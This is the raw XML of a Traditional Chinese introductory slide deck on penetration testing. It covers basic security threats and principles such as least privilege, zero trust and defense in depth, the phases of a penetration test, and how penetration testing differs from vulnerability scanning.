            <a:off x="1066800" y="2464100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548929" y="2456909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9363908" y="2456909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271292" y="3429000"/>
            <a:ext cx="2305556" cy="33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3903687" y="3428999"/>
            <a:ext cx="2305556" cy="33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484066" y="3428998"/>
            <a:ext cx="2305556" cy="33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34083" y="3899832"/>
            <a:ext cx="3080099" cy="183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網路竊聽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偷看機密資訊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503513" y="3899832"/>
            <a:ext cx="3080099" cy="183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竄改內容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刪除檔案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8962277" y="3899832"/>
            <a:ext cx="3080099" cy="183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Denial of service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不讓授權者使用資訊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一些簡單的資安知識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066800" y="1277592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Security principle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2718033" y="1988191"/>
            <a:ext cx="0" cy="20804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6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5865304" y="3692553"/>
            <a:ext cx="0" cy="20804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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345043" y="2222550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最小權限原則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3068337" y="222028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零信任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6502632" y="222028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 Security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50723" y="2860131"/>
            <a:ext cx="2152818" cy="21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只給予用戶執行工作所需的最低存取級別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9204121" y="1855365"/>
            <a:ext cx="0" cy="20804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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9510841" y="222028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縱深防禦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473967" y="2860131"/>
            <a:ext cx="2152818" cy="21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放置多層安全控制來保護資訊資源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2984564" y="2860131"/>
            <a:ext cx="2152818" cy="21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一種網路資安的架構，預設沒有任何人、設備受到信任，而且每個嘗試存取資源的使用者都需要進行驗證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135149" y="2860131"/>
            <a:ext cx="2654471" cy="21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 "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW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使用開源理念和方法來應對電腦安全性等等的安全性挑戰</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168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什麼是滲透測試?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345042" y="2086762"/>
            <a:ext cx="11846957" cy="371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透過模擬駭客與惡意使用者的思維，嘗試攻破入侵企業網站、資訊系統或設備等軟體，完成之後分析測試目標的風險並評估安全性。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在受到真正的攻擊之前，提早發現安全性的漏洞並加以改善修正。</a:t>
            </a:r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滲透測試流程</a:t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195308" y="2684578"/>
            <a:ext cx="2193019" cy="10383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989284" y="2684578"/>
            <a:ext cx="2255545" cy="103830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840455" y="2684578"/>
            <a:ext cx="2255545" cy="103830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696957" y="2684578"/>
            <a:ext cx="2255545" cy="103830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7548128" y="2665703"/>
            <a:ext cx="2255545" cy="103830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9420268" y="2665703"/>
            <a:ext cx="2426689" cy="103830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95308" y="295049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資料蒐集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2171090" y="2970068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弱點掃描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4032568" y="2962044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目標滲透</a:t>
            </a:r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5889070" y="295049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清除紀錄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7743738" y="295049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撰寫報告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9594909" y="2950497"/>
            <a:ext cx="207907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zh-TW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修復複測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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345043" y="378571"/>
            <a:ext cx="10058400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滲透測試 vs 弱點掃描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345043" y="1999045"/>
            <a:ext cx="2263933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弱點掃描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45043" y="3921520"/>
            <a:ext cx="2263933" cy="46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zh-TW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滲透測試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2608976" y="1999045"/>
            <a:ext cx="9311780" cy="14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透過自動化掃描軟體工具偵測作業系統與軟體系統的弱點，可用較低的成本在較短的時間內完成修正，但缺點是僅能檢測出既有的安全漏洞，針對最新的資安漏洞無法給予修補建議。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2608976" y="3916992"/>
            <a:ext cx="9311780" cy="136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zh-TW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利用不同的弱點進行組合式攻擊，驗證任何可能突破網站防禦系統的入侵漏洞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825153" y="3985036"/>
            <a:ext cx="528506" cy="2063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825153" y="2094649"/>
            <a:ext cx="528506" cy="2063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1826</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>220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1" baseType="lpstr">
      <vt:lpstr>Arial Rounded</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>回顧</vt:lpstr>
      <vt:lpstr>滲透測試 (1)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開始建環境吧!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滲透測試 (1)</dc:title>
  <dc:creator>王佑任</dc:creator>
  <cp:lastModifiedBy>王佑任</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-13T17:35:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-20T16:45:10Z</dcterms:modified>
</cp:coreProperties>
</file>